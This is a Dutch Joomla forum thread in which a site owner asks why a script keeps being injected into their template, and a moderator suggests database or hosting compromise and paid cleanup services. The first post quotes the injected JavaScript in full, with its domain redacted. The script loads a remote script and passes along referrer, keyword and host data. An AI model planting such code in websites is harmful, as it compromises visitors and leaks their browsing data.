Skip to main content

Laatste nieuws

Welkom bij Joomla!NL

Om alle mogelijkheden van dit forum te kunnen gebruiken, moet je je eerst registreren.

Vermeld in iedere vraag duidelijk:
  1. De versie van Joomla! 3.X die je gebruikt
  2. De volledige url van je website indien mogelijk.
  3. De versie van de extensie waar de vraag over gaat.

Periodiek besmet script in template index

Periodiek besmet script in template index

15 mrt 2016 10:32
#1
Een site lijkt gehacked (geweest), vermoeden gebaseerd op:

Er wordt periodiek een script in de template index.php geplaatst. Betreft onderstaande code (domein in URL heb ik verwijderd, is soms een domeinnaam, soms een IP adres):
Code:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://xxxxxxxxx/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://xxxxxxxxx/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

Situatie:
  • Joomla is up-to-date (3.4.8)
  • Extensions up-to-date
Genomen maatregelen:
  • FTP wachtwoord is aangepast
  • Database wachtwoord aangepast
  • Joomla accounts wachtwoord is aangepast
  • Besmette Joomla PHP bestanden (In enkele tientallen bestanden was een regel code bovenaan het PHP bestand toegevoegd ) opgeschoond (opgespoord met Akeeba Admin Tools)
  • Besmette niet Joomla gerelateerde PHP bestanden verwijderd (opgespoord met Akeeba Admin Tools)
Waar zou de bron van deze besmetting nog kunnen zitten?
Het is kennelijk al dusdanig lang aan de hand dat er geen volledig schone back-up beschikbaar is.
Discussie gesloten.
  • jantje88
  • jantje88's berichtenfoto Heeft onderwerp gestart
  • Bekend met Joomla!NL
  • Bekend met Joomla!NL
  • Berichten: 65

Periodiek besmet script in template index

15 mrt 2016 11:26 - 15 mrt 2016 13:51
#2
In het ergste geval kan zelf de database besmet zijn, waardoor hackers langs die weg nog toegang hebben.
Ook zijn niet alle hostingbedrijven waterdicht.
Zo zijn er bedrijven die de mogelijkheid bieden om meerdere domeinen (sites) op één account te draaien en de sites niet van elkaar te scheiden, waardoor er via een besmette site de schone site aangevallen kunnen worden.

Mocht je er zelf niet uitkomen waar het zit, dan kun je gebruik maken van de diensten van Sucuri of MyJoomla.
Tegen betaling helpen zij je aan een schone website.
Met vriendelijke groet,
Wouter Compactweb.nl
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum.
Wil je Joomla!NL steunen? Dat kan met een donatie.
Laatst bewerkt 15 mrt 2016 13:51 door Jelle. Reden: Typo's
Discussie gesloten.
  • WoodyF4u
  • WoodyF4u's Profielfoto
  • Moderator + Nieuwsteam
  • Moderator + Nieuwsteam
  • Berichten: 11380
Moderators: JelleRomke
Tijd voor maken pagina: 0.781 seconden
Gemaakt door Kunena

Laatste forumberichten

Wil je Joomla!NL steunen?

Steun Joomla!NLAlle teamleden werken enthousiast, op vrijwillige basis, mee aan Joomla!NL. Maar een website met forum kost nu eenmaal geld. Dus als je Joomla!NL wilt steunen, dan kan dat, graag zelfs!

Lees hier meer informatie